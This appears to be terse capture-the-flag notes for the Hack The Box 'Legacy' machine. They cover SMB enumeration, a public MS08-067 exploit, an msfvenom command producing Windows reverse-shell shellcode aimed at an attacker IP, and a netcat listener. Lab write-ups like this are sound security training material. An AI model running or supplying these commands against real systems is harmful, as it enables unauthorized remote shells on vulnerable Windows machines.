Legacy HTB
Enumeration
Nmap scan done:
This can give shell access and is important but not gonna use this now message_signing: disabled (dangerous, but default)
Trying to access SMB
smbclient -L \\10.10.10.4
leads to asking for passwordWe can use enum4linux or metasploit for smb version detections
Found os using
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 10.10.10.4
Using Metasploit
Without metasploit
https://github.com/andyacer/ms08_067/tree/master used the ms08_067 exploit
Generated shellcode with
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.4 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
and pasted in the python file.listening on port 443:
nc -lnvp 443
Last updated